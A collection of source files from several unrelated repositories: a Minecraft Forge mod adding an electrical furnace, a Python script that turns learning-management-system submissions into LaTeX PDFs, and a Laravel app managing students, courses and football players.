import net.minecraft.tileentity.TileEntity;
import net.minecraft.tileentity.TileEntityFurnace;
import net.minecraft.util.ChatComponentTranslation;
import net.minecraft.util.EnumFacing;
import net.minecraft.util.IChatComponent;
/**
* Base class for all of the electrical engineering tile entities
*
* @author minecreatr
*/
public abstract class ElectricalEngineeringTile extends TileEntity implements ISidedInventory, IEnergyProvider, IEnergyReceiver, IUpdatePlayerListBox{
protected ItemStack[] inventory;
protected int stackLimit;
private EnumFacing facing;
protected EnergyStorage energyStorage;
public ElectricalEngineeringTile(int inventorySize, int energyCapacity, EnumFacing facing){
this(inventorySize, 64, energyCapacity, facing);
}
public ElectricalEngineeringTile(int inventorySize, int stackLimit, int energyCapacity, EnumFacing facing){
inventory = new ItemStack[inventorySize];
this.stackLimit = stackLimit;
energyStorage = new EnergyStorage(energyCapacity);
this.facing = facing;
}
public abstract void writeData(NBTTagCompound compound);
public abstract void readData(NBTTagCompound compound);
@Override
public void writeToNBT(NBTTagCompound compound)
{
super.writeToNBT(compound);
NBTUtil.writeInventory("inventory", compound, inventory);
energyStorage.writeToNBT(compound);
NBTUtil.writeEnumFacing(facing, compound);
this.writeData(compound);
}
@Override
public void readFromNBT(NBTTagCompound compound)
{
super.readFromNBT(compound);
inventory = NBTUtil.readInventory("inventory", compound);
energyStorage.readFromNBT(compound);
facing = NBTUtil.readEnumFacing(compound);
this.readData(compound);
}
/**
* Get the direction the tile is facing
* @return The EnumFacing
*/
public EnumFacing getEnumFacing(){
return this.facing;
}
public int getSizeInventory(){
return inventory.length;
}
public ItemStack getStackInSlot(int index){
return inventory[index];
}
public ItemStack decrStackSize(int slot, int amt){
ItemStack stack = getStackInSlot(slot);
if (stack != null) {
if (stack.stackSize <= amt) {
setInventorySlotContents(slot, null);
} else {
stack = stack.splitStack(amt);
if (stack.stackSize == 0) {
setInventorySlotContents(slot, null);
}
}
}
return stack;
}
public ItemStack getStackInSlotOnClosing(int index){
return getStackInSlot(index);
}
public void setInventorySlotContents(int index, ItemStack stack){
inventory[index] = stack;
}
public int getInventoryStackLimit(){
return stackLimit;
}
public void markDirty(){
}
@Override
public Packet getDescriptionPacket() {
NBTTagCompound tagCompound = new NBTTagCompound();
writeToNBT(tagCompound);
return new S35PacketUpdateTileEntity(pos, 1, tagCompound);
}
@Override
public void onDataPacket(NetworkManager networkManager, S35PacketUpdateTileEntity packet) {
readFromNBT(packet.getNbtCompound());
}
public boolean isUseableByPlayer(EntityPlayer player){
return true;
}
public void openInventory(EntityPlayer player){
}
public void closeInventory(EntityPlayer player){
}
//Field 0 is power, field 1 is power capacity
public int getField(int id) {
if (id==0){
return energyStorage.getEnergyStored();
}
else if (id==1){
return energyStorage.getMaxEnergyStored();
}
else {
return getExtraField(id);
}
}
/**
* Gets the extra field with the id
* @param id The Id
* @return the value of the extra field
*/
protected int getExtraField(int id){
return 0;
}
public void setField(int id, int value) {
if (id==0){
energyStorage.setEnergyStored(value);
}
else if (id==1){
energyStorage.setCapacity(value);
}
else {
setExtraField(id, value);
}
}
/**
* Sets any extra field
* @param id field id
* @param value field value
*/
protected void setExtraField(int id, int value){
}
public int getFieldCount() {
return 2;
}
/**
* How many extra fields besides power
* @return How many extra fields
*/
protected int getExtraFieldsCount(){
return 0;
}
public void clear(){
for (int i=0;i<inventory.length;i++){
inventory[i] = null;
}
}
public String getName(){
return "electricalEngineeringTile";
}
public boolean hasCustomName(){
return false;
}
public IChatComponent getDisplayName(){
return new ChatComponentTranslation(getName());
}
public ItemStack[] getContents(){
return inventory;
}
public boolean isItemValidForSlot(int index, ItemStack stack){
return true;
}
public boolean canConnectEnergy(EnumFacing facing){
return true;
}
public int[] getSlotsForFace(EnumFacing side){
return new int[]{0};
}
public int receiveEnergy(EnumFacing facing, int maxReceive, boolean simulate){
return energyStorage.receiveEnergy(maxReceive, simulate);
}
public int getEnergyStored(EnumFacing facing){
return energyStorage.getEnergyStored();
}
public int getMaxEnergyStored(EnumFacing facing){
return energyStorage.getMaxEnergyStored();
}
public int extractEnergy(EnumFacing facing, int maxExtract, boolean simulate){
return energyStorage.extractEnergy(maxExtract, simulate);
}
}
<file_sep># ElectricalEngineering
Mod about Electricity and technology
for minecraft 1.8
by minecreatr
<file_sep>package com.minecreatr.electricalengineering.common.init;
import com.minecreatr.electricalengineering.Reference;
import com.minecreatr.electricalengineering.common.block.BlockElectricalFurnace;
import com.minecreatr.electricalengineering.common.tile.TileElectricalFurnace;
import net.minecraftforge.fml.common.registry.GameRegistry;
/**
* Used for registering all the mods tileentities
*
* @author minecreatr
*/
public class ModTiles implements Reference{
public static void preInit(){
GameRegistry.registerTileEntity(TileElectricalFurnace.class, "electricalFurnace");
}
}
<file_sep>package com.minecreatr.electricalengineering.common.tile;
import net.minecraft.item.ItemStack;
import net.minecraft.item.crafting.FurnaceRecipes;
import net.minecraft.nbt.NBTTagCompound;
import net.minecraft.tileentity.TileEntityFurnace;
import net.minecraft.util.EnumFacing;
/**
* Tile entity for an electrical furnace
*
* @author minecreatr
*/
public class TileElectricalFurnace extends ElectricalEngineeringTile {
/**
* The amount of progress on smelting the item, the field value is 2
*/
private int smeltProgress;
public TileElectricalFurnace(EnumFacing f){
super(2, 64, 32000, f);
smeltProgress = 0;
}
public void writeData(NBTTagCompound compound){
compound.setInteger("cookTime", smeltProgress);
}
public void readData(NBTTagCompound compound){
smeltProgress = compound.getInteger("cookTime");
}
@Override
protected int getExtraFieldsCount(){
return 1;
}
@Override
protected void setExtraField(int id, int value){
if (id==2){
smeltProgress = value;
}
}
@Override
protected int getExtraField(int id){
if (id==2){
return smeltProgress;
}
else {
return 0;
}
}
@Override
public boolean canInsertItem(int index, ItemStack itemStackIn, EnumFacing direction){
return (index==0&&getStackInSlot(index)==null);
}
@Override
public boolean canExtractItem(int index, ItemStack stack, EnumFacing direction){
return (index==1&&getStackInSlot(index)!=null);
}
@Override
public boolean isItemValidForSlot(int index, ItemStack stack){
if (index==1){
return false;
}
if (FurnaceRecipes.instance().getSmeltingResult(stack)!=null){
return true;
}
return false;
}
public int[] getSlotsForFace(EnumFacing side){
if (side==EnumFacing.UP){
return new int[]{0};
}
else {
return new int[]{1};
}
}
public void update(){
}
@Override
public String getName(){
return "electricalFurnace.name";
}
}
<file_sep>package com.minecreatr.electricalengineering;
import com.minecreatr.electricalengineering.common.CommonProxy;
import com.minecreatr.electricalengineering.common.init.ModBlocks;
import com.minecreatr.electricalengineering.common.init.ModTiles;
import net.minecraft.creativetab.CreativeTabs;
import net.minecraft.init.Items;
import net.minecraft.item.Item;
import net.minecraftforge.fml.common.Mod;
import net.minecraftforge.fml.common.SidedProxy;
import net.minecraftforge.fml.common.event.FMLPreInitializationEvent;
/**
* Main mod class
* This mode adds stuff that has to do with electricity and technology
*
* @author minecreatr
*/
@Mod(modid = Reference.MODID, name = Reference.MOD_NAME, version = Reference.VERSION)
public class ElectricalEngineering implements Reference{
@Mod.Instance(MODID)
public static ElectricalEngineering instance;
@SidedProxy(clientSide = CLIENT_PROXY, serverSide = SERVER_PROXY)
public static CommonProxy proxy;
public static final CreativeTabs tab = new CreativeTabs("tabElectricalEngineering") {
@Override
public Item getTabIconItem() {
return Items.armor_stand;
}
};
@Mod.EventHandler
public void preInit(FMLPreInitializationEvent event){
proxy.preInit(this);
ModBlocks.preInit();
ModTiles.preInit();
}
}
<file_sep>package com.minecreatr.electricalengineering.client.gui;
import com.minecreatr.electricalengineering.common.inventory.ContainerElectricalFurnace;
import com.minecreatr.electricalengineering.common.tile.TileElectricalFurnace;
import net.minecraft.client.gui.inventory.GuiContainer;
import net.minecraft.client.renderer.GlStateManager;
import net.minecraft.entity.player.InventoryPlayer;
import net.minecraft.inventory.IInventory;
import net.minecraft.tileentity.TileEntityFurnace;
import net.minecraft.util.ResourceLocation;
/**
* Gui for the electrical furnace
*
* @author minecreatr
*/
public class GuiElectricalFurnace extends GuiContainer{
private static final ResourceLocation texture = new ResourceLocation("textures/gui/container/furnace.png");
private TileElectricalFurnace tile;
private InventoryPlayer playerInventory;
public GuiElectricalFurnace(InventoryPlayer player, TileElectricalFurnace inventory){
super(new ContainerElectricalFurnace(player, inventory));
this.tile = inventory;
this.playerInventory = player;
}
protected void drawGuiContainerForegroundLayer(int mouseX, int mouseY)
{
String s = this.tile.getDisplayName().getUnformattedText();
this.fontRendererObj.drawString(s, this.xSize / 2 - this.fontRendererObj.getStringWidth(s) / 2, 6, 4210752);
this.fontRendererObj.drawString(this.playerInventory.getDisplayName().getUnformattedText(), 8, this.ySize - 96 + 2, 4210752);
}
protected void drawGuiContainerBackgroundLayer(float partialTicks, int mouseX, int mouseY)
{
GlStateManager.color(1.0F, 1.0F, 1.0F, 1.0F);
this.mc.getTextureManager().bindTexture(texture);
int k = (this.width - this.xSize) / 2;
int l = (this.height - this.ySize) / 2;
this.drawTexturedModalRect(k, l, 0, 0, this.xSize, this.ySize);
int i1;
}
}
<file_sep>package com.minecreatr.electricalengineering.client;
import com.minecreatr.electricalengineering.ElectricalEngineering;
import com.minecreatr.electricalengineering.client.gui.GuiElectricalFurnace;
import com.minecreatr.electricalengineering.common.CommonProxy;
import com.minecreatr.electricalengineering.common.inventory.ContainerElectricalFurnace;
import com.minecreatr.electricalengineering.common.tile.ElectricalEngineeringTile;
import com.minecreatr.electricalengineering.common.tile.TileElectricalFurnace;
import net.minecraft.entity.player.EntityPlayer;
import net.minecraft.util.BlockPos;
import net.minecraft.world.World;
import net.minecraftforge.fml.common.network.IGuiHandler;
import net.minecraftforge.fml.common.network.NetworkRegistry;
/**
* Client side proxy and gui handler
*
* @author minecreatr
*/
public class ClientProxy extends CommonProxy implements IGuiHandler{
@Override
public void preInit(ElectricalEngineering mod){
NetworkRegistry.INSTANCE.registerGuiHandler(mod, this);
}
@Override
public Object getServerGuiElement(int ID, EntityPlayer player, World world, int x, int y, int z){
BlockPos pos = new BlockPos(x, y, z);
if (!(world.getTileEntity(pos) instanceof ElectricalEngineeringTile)){
return null;
}
switch (ID){
case 0: return new ContainerElectricalFurnace(player.inventory, (TileElectricalFurnace)world.getTileEntity(pos));
default: return null;
}
}
@Override
public Object getClientGuiElement(int ID, EntityPlayer player, World world, int x, int y, int z){
BlockPos pos = new BlockPos(x, y, z);
if (!(world.getTileEntity(pos) instanceof ElectricalEngineeringTile)){
return null;
}
switch (ID){
case 0: return new GuiElectricalFurnace(player.inventory, (TileElectricalFurnace)world.getTileEntity(pos));
default: return null;
}
}
}
| dbc332907bc5a64c0605efb9754f7bf6dc5b468c | [
"Markdown",
"Java"
] | 7 | Java | minecreatr/ElectricalEngineering | 41d390161e6772f6353676fd913af3da01ca1539 | 0afff70170a834e571bbeaad60e6f92825acf664 |
refs/heads/master | <file_sep>package sfw2020;
public class SFW2020testFramework {
public static void main(String[] args) {
}
}
| e222c7be634f55baa215ae946c963b8da1f34bec | [
"Java"
] | 1 | Java | mrtbd88/SFW2020 | c7b7e4e7e9484e8149c3c7f03328cb146e9600bd | 45d2c4dc36d402c8809f2d2576537b9f6a4639ed |
refs/heads/master | <repo_name>dungvtdev/helpy<file_sep>/README.md
# Helpy
Help-er tin-y aka tiny helper.
A simple set of tools which help you some simple task in linux enviroment.
<file_sep>/tinynote/tinynote.py
#! /usr/bin/python2
# tinynote.py - commandline simple note, file sys.
import sys,os
import printbeautify as printb
commands={}
maxNameLen=10
dataFolder=''
noteFile=''
"""
Cmd functions
"""
# wrap function for command function
def command(func):
commands[func.__name__]=func
return func
@command
def path(params):
printb.info("Current data folders: %s" % dataFolder)
@command
def listnotes(params):
path(params)
for filename in next(os.walk(dataFolder))[2]:
print(filename)
"""
Loop dispatch command
"""
def getCurrentName():
n = noteFile[:min(maxNameLen,len(noteFile))] + '# '
return n
def loopInput():
# loopContinue=True
while(True):
n=getCurrentName() # note# (input)
sinput=raw_input(n)
if not sinput:
printb.error('Need type command')
continue
if sinput.strip() == 'quit':
break;
dispatchCmd(sinput)
def dispatchCmd(sinput):
params=sinput.split()
if len(params)==0 or params[0] not in commands.keys():
printb.error('Command Not Found')
return False
method_name=params[0]
method=commands[method_name]
method(params[1:])
return True
if __name__=='__main__':
print(commands.keys())
if len(sys.argv) >= 2:
dataFolder=sys.argv[1]
loopInput()
printb.info('Note end')
<file_sep>/tinynote/printbeautify.py
#! /usr/bin/python2
# printbeautify.py - wrap color text, specify styles
from functools import wraps
CSI='\x1B['
reset = CSI+'0m'
Black,Red,Green,Yellow,Blue,Purple,Cyan,White = range(0,8)
NoEffect,Bold,Underline,Negative1,Negative2 = [0,1,2,3,5]
def colorText(colorInt):
c=colorInt+30
return str(c)
def colorBackgroud(colorInt):
c=colorInt+40
return str(c)
def colorString(textCol, bgCol):
return colorText(textCol)+';'+colorBackgroud(bgCol)+'m'
def raw_print(s):
print(s)
def color(colorval):
def color_decorator(func):
wraps(func)
def func_wrap(s):
func(CSI+colorval+s+reset)
return func_wrap
return color_decorator
error=color(colorString(Red,Black))(raw_print)
log=raw_print
info=color(colorString(Green,Black))(raw_print)
warning=color(colorString(Yellow,Black))(raw_print) | 40305f60d7636fb245f3aba994c9bf19ca4d0659 | [
"Markdown",
"Python"
] | 3 | Markdown | dungvtdev/helpy | c12a76fd55e310fcc32d88217580a58bc88c3510 | 1f6cc1d77849fc1385c3d35585d87d5b19df8ea1 |
refs/heads/master | <repo_name>gonsp/Motion-Drawing<file_sep>/leap/src/main.py
import sys
from socketIO_client import SocketIO, LoggingNamespace
sys.path.insert(0, "../lib")
import Leap
import select
from Leap import CircleGesture, KeyTapGesture, ScreenTapGesture, SwipeGesture
is_calibrated = False
corners = []
origin = None
dimension = None
is_hand_present = False
socket = SocketIO('localhost', 3000, LoggingNamespace)
class SampleListener(Leap.Listener):
def on_connect(self, controller):
print "Connected"
def on_frame(self, controller):
global is_hand_present
frame = controller.frame()
fingers = frame.fingers
if is_hand_present and fingers.is_empty:
is_hand_present = False
socket.emit('hand_detection', {'hand-detected': is_hand_present})
print "no hand"
elif not is_hand_present and not fingers.is_empty:
is_hand_present = True
socket.emit('hand_detection', {'hand-detected': is_hand_present})
print "HAND DETECTED"
if not fingers.is_empty:
index = fingers.finger_type(Leap.Finger.TYPE_INDEX)
index = Leap.Finger(index[0])
tip_pos = index.stabilized_tip_position
if not is_calibrated:
calibrate(tip_pos)
else:
if frame.id % 10 == 0:
pos = refresh(tip_pos)
print pos
socket.emit('leap-event', {'x': pos[0], 'y': pos[1]})
def calibrate(pos):
global corners
if select.select([sys.stdin, ], [], [], 0.0)[0]:
sys.stdin.readline()
corners.append(pos)
print "CALIBRATED CORNERS: %i, CORNER %i: X: %i Y: %i" % \
(len(corners), len(corners), corners[-1][1], -corners[-1][2])
socket.emit('calibrated-corners', {'num_corners': len(corners)})
if len(corners) == 4:
global is_calibrated
is_calibrated = True
global origin
origin_x = corners[0][1]
origin_y = -corners[0][2]
origin = [origin_x, origin_y]
print "ORIGIN X: %i, ORIGIN Y: %s" % (origin_x, origin_y)
global dimension
x_pos = corners[2][1] - origin_x
y_pos = -corners[2][2] - origin_y
dimension = [x_pos, y_pos]
# possible recalibration --> relocate dimension
# x1_pos = corners[1][1] - origin_x
# y1_pos = -corners[3][2] - origin_y
# if abs(x_pos - x1_pos) > 20 or abs(y_pos - y1_pos) > 20:
# corners = []
# is_calibrated = False
# print "RECALIBRATE"
# socket.emit('calibrated-corners', {'num_corners': len(corners)})
# else:
# dimension = [(x_pos + x1_pos) / 2.0, (y_pos + y1_pos) / 2.0]
# print "DIM X: %i, DIM Y: %s" % ((x_pos + x1_pos) / 2.0, (y_pos + y1_pos) / 2.0)
def refresh(tip_pos):
x = tip_pos[1]
y = -tip_pos[2]
x_pos = max(0, min((x - origin[0]) / dimension[0], 1))
y_pos = max(0, min((y - origin[1]) / dimension[1], 1))
return [round(x_pos, 2), round(y_pos, 2)]
def main():
# Create a sample listener and controller
listener = SampleListener()
controller = Leap.Controller()
controller.set_policy(Leap.Controller.POLICY_OPTIMIZE_HMD)
controller.set_policy(Leap.Controller.POLICY_BACKGROUND_FRAMES)
# Have the sample listener receive events from the controller
controller.add_listener(listener)
while True:
pass
if __name__ == "__main__":
main()
<file_sep>/server/public/javascripts/handscroll.js
var canScroll = true;
$(function() {
document.addEventListener('gest', function(gesture) {
if (gesture.left && curActiveCol >= 3) {
return;
} else if (gesture.right && curActiveCol <= 0) {
return;
} else if (gesture.down && curActiveRow <= 0) {
return;
} else if (gesture.up && curActiveRow >= 3) {
return;
}
$(boxes[curActiveRow][curActiveCol]).removeClass('a-box')
if (canScroll && gesture.left) {
$.fn.fullpage.moveSlideRight();
curActiveCol++;
} else if (canScroll && gesture.right) {
$.fn.fullpage.moveSlideLeft();
curActiveCol--;
} else if (canScroll && gesture.up) {
$.fn.fullpage.moveSectionDown();
curActiveRow++;
} else if (canScroll) {
$.fn.fullpage.moveSectionUp();
curActiveRow--;
}
$(boxes[curActiveRow][curActiveCol]).addClass('a-box')
}, false);
gest.start();
});
<file_sep>/touchpad/wrapper.py
#!/usr/bin/env python
import sys
import subprocess
# from socketIO_client import SocketIO, LoggingNamespace
# socket = SocketIO('localhost', 3000, LoggingNamespace)
def main():
process = subprocess.Popen(["./build/Release/FingerMgmt.app/Contents/MacOS/FingerMgmt"], stdout=subprocess.PIPE)
for line in iter(process.stdout.readline, ''):
sys.stdout.write(line)
print(line)
if __name__ == "__main__":
main()
<file_sep>/touchpad/Tests/LinuxMain.swift
import XCTest
@testable import touchpadTests
XCTMain([
testCase(touchpadTests.allTests),
])
<file_sep>/README.md
# IMOD
Interactive Motion Drawing
<file_sep>/server/public/javascripts/mapmove.js
var boxes = new Array(4);
var curActiveRow = 0;
var curActiveCol = 0;
for (var i = 0; i < boxes.length; i++) {
boxes[i] = new Array(4);
}
elements = document.getElementsByClassName('box');
for (var i = 0; i < elements.length; i++) {
boxes[Math.floor(i / 4)][i % 4] = elements[i];
}
<file_sep>/leap/src/comm.py
from socketIO_client import SocketIO, LoggingNamespace
with SocketIO('localhost', 3000, LoggingNamespace) as socketIO:
#socketIO.emit('calibrate',{'reading_status':is_reading})
#socketIO.emit('hand detection')
socketIO.emit('leap-event', {'x': 0.5, 'y': 0.1})
socketIO.wait(seconds=0.1)
<file_sep>/server/public/javascripts/draw.js
var socket = io();
var lastTimestamp;
socket.on('leap-event-client', function (data) {
if (Date.now() - lastTimestamp > 120) {
$('#pointerImg').show();
} else {
$('#pointerImg').hide();
}
var screenY = data.y * window.innerHeight;
var screenX = data.x * window.innerWidth;
$("#pointerImg").css({'top': screenY + 'px', 'left': screenX + 'px'});
});
socket.on('trackpad-event-client', function (data) {
var dataContext = parseInt(curActiveRow) + 1;
var curentRow = $("div[data-anchor=" + dataContext + "]");
var maybe = curentRow.find(".active");
var next = maybe.find("canvas");
var ctx = next[0].getContext("2d");
if (Date.now() - lastTimestamp > 120) {
ctx.closePath();
ctx.beginPath();
}
lastTimestamp = Date.now();
var screenY = data.y * window.innerHeight;
var screenX = data.x * window.innerWidth;
ctx.lineTo(screenX, screenY);
ctx.stroke();
});
$(document).ready(function () {
window.requestAnimFrame = function () {
return window.requestAnimationFrame ||
window.webkitRequestAnimationFrame ||
window.mozRequestAnimationFrame ||
window.oRequestAnimationFrame ||
window.msRequestAnimationFrame ||
function (callback) {
callback()
}
}();
$('#fullpage').fullpage({
//Navigation
menu: '#menu',
lockAnchors: false,
anchors: ['1', '2', '3', '4'],
navigation: false,
navigationPosition: 'right',
navigationTooltips: ['1', '2', '3', '4'],
showActiveTooltip: false,
slidesNavigation: false,
slidesNavPosition: 'bottom',
//Scrolling
css3: true,
scrollingSpeed: 1200,
autoScrolling: true,
fitToSection: true,
fitToSectionDelay: 1000,
scrollBar: false,
easing: 'easeInOutCubic',
easingcss3: 'ease',
loopBottom: false,
loopTop: false,
loopHorizontal: false,
continuousVertical: false,
continuousHorizontal: false,
scrollHorizontally: false,
interlockedSlides: false,
dragAndMove: false,
offsetSections: false,
resetSliders: false,
fadingEffect: false,
normalScrollElements: null,
scrollOverflow: false,
scrollOverflowReset: false,
scrollOverflowOptions: null,
touchSensitivity: 15,
normalScrollElementTouchThreshold: 5,
bigSectionsDestination: null,
//Accessibility
keyboardScrolling: false,
animateAnchor: false,
recordHistory: true,
//Design
controlArrows: false,
verticalCentered: true,
sectionsColor: ['#ccc', '#fff'],
paddingTop: '3em',
paddingBottom: '10px',
fixedElements: null,
responsiveWidth: 0,
responsiveHeight: 0,
responsiveSlides: false,
parallax: false,
parallaxOptions: {type: 'reveal', percentage: 62, property: 'translate'},
//Custom selectors
sectionSelector: '.section',
slideSelector: '.slide',
lazyLoading: true,
//events
onLeave: function (index, nextIndex, direction) {
var prevSlide = $('body').attr('class').split('-')[3];
if (prevSlide != '0') {
var leavingSection = $(this);
requestAnimFrame(function () {
$.fn.fullpage.moveTo(nextIndex, parseInt(prevSlide));
canScroll = false
return false;
});
}
},
afterLoad: function (anchorLink, index) {
canScroll = true;
},
afterRender: function () {
},
afterResize: function () {
},
afterResponsive: function (isResponsive) {
},
afterSlideLoad: function (anchorLink, index, slideAnchor, slideIndex) {
canScroll = true;
},
onSlideLeave: function (anchorLink, index, slideIndex, direction, nextSlideIndex) {
canScroll = false;
}
});
});
var canvasContexts = [];
// Drawing part
function update(jscolor) {
// 'jscolor' instance can be used as a string
for (var i = 0; i < canvasContexts.length; i++) {
canvasContexts[i].strokeStyle = '#' + jscolor
}
}
$('.c').each(function () {
var ctx = this.getContext('2d');
canvasContexts.push(ctx);
var classes = $(this).attr('class').split(' ');
this.width = window.innerWidth;
this.height = window.innerHeight;
ctx.beginPath();
ctx.lineWidth = 10;
ctx.lineJoin = ctx.lineCap = 'round';
if (classes.includes('can-lt-corner')) {
$(this).css("margin-left", "40px");
$(this).css("margin-top", "40px");
} else if (classes.includes('can-rt-corner')) {
this.width -= 70;
$(this).css("margin-top", "40px");
} else if (classes.includes('can-l')) {
$(this).css("margin-left", "40px");
} else if (classes.includes('can-r')) {
this.width -= 70;
} else if (classes.includes('can-t')) {
$(this).css("margin-top", "40px");
} else if (classes.includes('can-lb-corner')) {
$(this).css("margin-left", "40px");
this.height -= 60;
$(this).css("margin-bottom", "60px");
} else if (classes.includes('can-rb-corner')) {
this.width -= 70;
this.height -= 60;
$(this).css("margin-bottom", "60px");
} else if (classes.includes('can-b')) {
$(this).css("margin-bottom", "60px");
this.height -= 60;
}
});
| f2670c3028e7f7acbd49dfcc709d64dfe6802e2e | [
"JavaScript",
"Python",
"Markdown",
"Swift"
] | 8 | Python | gonsp/Motion-Drawing | 33e0871ab8d2270d26737faf39c85526e1b98519 | aa3b05e44b9e0d586885859c1525ec5c662591e5 |
refs/heads/master | <repo_name>TejasAvinashShetty/code2tex<file_sep>/hello_worlds/PHP.php
<?php
echo "Hello World!";
//";" at the end is optional
?>
<file_sep>/convert_all.py
#!/usr/bin/env python3
import re
import subprocess
import sys
from collections import defaultdict
from pathlib import Path
import code2tex
def main():
if len(sys.argv) != 2:
sys.exit('''Usage: %s [DIRECTORY]
Outputs .tex files and generate PDFs in CWD
Languages (for syntax highlighting) determined from file extensions.''' % (sys.argv[0],))
# Check existence of folder
directory = Path(sys.argv[1])
if not directory.is_dir():
sys.exit("Directory not found: %s" % directory)
matched = defaultdict(list)
not_matched = []
# Regexes for matching various LMS filenames
patterns = {}
patterns['Moodle'] = re.compile(r"([^/]+?_\d+)_assignsubmission_file_/(.+)$")
patterns['Canvas'] = re.compile(r"([^/]+?_\d+)_\d+_(.+)$")
# Gather all files in directory
files = directory.glob('**/*')
# Match filenames against any LMS patterns, storing those that match
for f in files:
if f.is_dir():
continue
for pattern in patterns.values():
match = re.search(pattern, str(f))
if match:
matchinfo = (str(f), match.group(2))
matched[match.group(1)].append(matchinfo)
break
else:
# triggered if end of for loop reached, break *not* used
not_matched.append(str(f))
# Output .tex and create PDFs for all matched files, grouped by name
for name in matched:
output_file_name = (name + "_files.tex").replace(" ", "_")
output_file = open(output_file_name, "w")
code2tex.makeTop(output_file)
for fullpath, filename in matched[name]:
code2tex.addListing(fullpath, filename, output_file)
code2tex.makeBottom(output_file)
output_file.close()
# Convert to PDF
print("[32m{}[m".format(output_file_name))
subprocess.call(["pdflatex", "-interaction=batchmode", output_file_name])
print()
print("CONVERTED FILES FOR NAMES")
for name in matched or ["---None---"]:
print(name)
print()
print("FILES NOT MATCHED")
for file in not_matched or ["---None---"]:
print(file)
if __name__ == "__main__":
main()
| 5db3ef819d3d6b47917fd2667a536507e0cf1b16 | [
"Python",
"PHP"
] | 2 | PHP | TejasAvinashShetty/code2tex | a21e40dd144ab0eeef7a5214be01e41389e308e7 | b456a137af4b42e3672ec7441068cfc72859f051 |
refs/heads/main | <file_sep><?php
namespace App\Http\Controllers;
use App\Models\Student;
use Illuminate\Http\Request;
class StudentController extends Controller
{
public function index(){
return view('student.index');
}
public function store(Request $request){
$data=$request->validate([
'name'=>[],
'identification'=>[]
]);
auth()->user()->student()->create($data);
return back();
}
public function edit(Student $student){
return view('student.edit',compact('student'));
}
public function update(Request $request,Student $student){
$data=$request->validate([
'name'=>[],
'identification'=>[]
]);
$student->update($data);
return redirect()->route('student.index');
}
public function destroy(Student $student){
$student->delete();
return back();
}
public function addStudentCourses(Student $student){
return view('courses.student',compact('student'));
}
//student course
public function studentcourse(Request $request,Student $student){
$data=$request->validate([
'course_id'=>[]
]);
$student->studentcourse()->syncWithoutDetaching($request->input('course_id',[]));
return back();
}
public function schedules(Student $student){
return view('student.schedules',compact('student'));
}
}
<file_sep>## Course Management
A syste to keep trach of students and courses
### Pre-requirisits
- You must have nodejs installed
- You must have XAMPP installed
- You must have composer installed
### Installation
Create a database for saving the data
```sh
cp .env.example .env
```
Change the database credentials to match yours
Run the following commands in the root directory of the project
```sh
composer install
php artisan key:generate
php artisan migrate
npm install && npm run dev
php artisan serve
```
Then open the browser and visit the url localhost:8000<file_sep><?php
namespace App\Providers;
use App\Models\Course;
use App\Models\Player;
use App\Models\Student;
use Illuminate\Support\Facades\View;
use Illuminate\Support\Facades\Schema;
use Illuminate\Support\ServiceProvider;
class AppServiceProvider extends ServiceProvider
{
/**
* Register any application services.
*
* @return void
*/
public function register()
{
//
}
/**
* Bootstrap any application services.
*
* @return void
*/
public function boot()
{
if(Schema::hasTable('students')){
View::share('students',Student::all());
}
if(Schema::hasTable('courses')){
View::share('courses',Course::all());
}
if(Schema::hasTable('players')){
View::share('players',Player::all());
}
}
}
<file_sep><?php
namespace App\Http\Controllers;
use App\Models\Course;
use Illuminate\Http\Request;
class CourseController extends Controller
{
public function index(){
return view('courses.index');
}
public function store(Request $request){
$data=$request->validate([
'name'=>[],
'identification'=>[],
'day'=>[],
'start_time'=>[],
'end_time'=>[],
'capacity'=>[]
]);
Course::create($data);
return back();
}
public function destroy(Course $course){
$course->delete();
return back();
}
}
<file_sep><?php
namespace App\Http\Controllers;
use App\Models\Player;
use Illuminate\Http\Request;
class PlayerController extends Controller
{
public function index(){
return view('player.index');
}
public function search(Request $request){
$search_query=$request->get('search_query');
$teams=Player::where('team','LIKE','%'.$search_query.'%')->get();
$heights=Player::where('height','LIKE','%'.$search_query.'%')->get();
$weights = Player::where('weight','LIKE','%'.$search_query.'%')->get();
$numbers = Player::where('number','LIKE','%'.$search_query.'%')->get();
return view('player.search',compact('teams','heights','weights','numbers'));
}
public function store(Request $request){
$data=$request->validate([
'team'=>[],
'name'=>[],
'number'=>[],
'height'=>[],
'weight'=>[]
]);
Player::create($data);
return back();
}
public function edit(Player $player){
return view('player.edit',compact('player'));
}
public function update(Request $request,Player $player){
$data=$request->validate([
'team'=>[],
'name'=>[],
'number'=>[],
'height'=>[],
'weight'=>[]
]);
$player->update($data);
return redirect()->route('player.index');
}
public function destroy(Player $player){
$player->delete();
return back();
}
}
<file_sep><?php
use Illuminate\Support\Facades\Route;
use App\Http\Controllers\CourseController;
use App\Http\Controllers\PlayerController;
use App\Http\Controllers\StudentController;
/*
|--------------------------------------------------------------------------
| Web Routes
|--------------------------------------------------------------------------
|
| Here is where you can register web routes for your application. These
| routes are loaded by the RouteServiceProvider within a group which
| contains the "web" middleware group. Now create something great!
|
*/
Route::get('/', function () {
return view('welcome');
});
Auth::routes();
Route::get('/home', [App\Http\Controllers\HomeController::class, 'index'])->name('home');
Route::get('/students',[StudentController::class,'index'])->name('student.index');
Route::get('/students/{student}',[StudentController::class,'edit'])->name('student.edit');
Route::post('/students/store',[StudentController::class,'store'])->name('student.store');
Route::patch('/students/{student}',[StudentController::class,'update'])->name('student.update');
Route::delete('/students/{student}/delete',[StudentController::class,'destroy'])->name('student.delete');
//student courses
Route::get('/students/{student}/courses',[StudentController::class,'addStudentCourses'])->name('add.student.courses');
Route::post('/student/{student}/course',[StudentController::class,'studentcourse'])->name('student.courses');
Route::get('/student/{student}/schedules',[StudentController::class,'schedules'])->name('schedules');
//course
Route::get('courses',[CourseController::class,'index'])->name('courses.index');
Route::post('courses/store',[CourseController::class,'store'])->name('courses.store');
Route::delete('course/{course}/delete',[CourseController::class,'destroy'])->name('course.delete');
//players
Route::get('/players',[PlayerController::class,'index'])->name('player.index');
Route::get('search',[PlayerController::class,'search'])->name('player.search');
Route::get('player/{player}',[PlayerController::class,'edit'])->name('player.edit');
Route::patch('player/{player}/update',[PlayerController::class,'update'])->name('player.update');
Route::post('player/store',[PlayerController::class,'store'])->name('player.store');
Route::delete('player/{player}/delete',[PlayerController::class,'destroy'])->name('player.delete');
| 7f9853362bb5c944d049087a0ecd66adf86e0e81 | [
"Markdown",
"PHP"
] | 6 | PHP | mysasse001/student-and-course-management-with-fifa-queries | 27e57114abee79ec3d1f6d929830d6ff618ced4a | 76f50ff5d32bc993dcff0389774c364c2d702c1a |
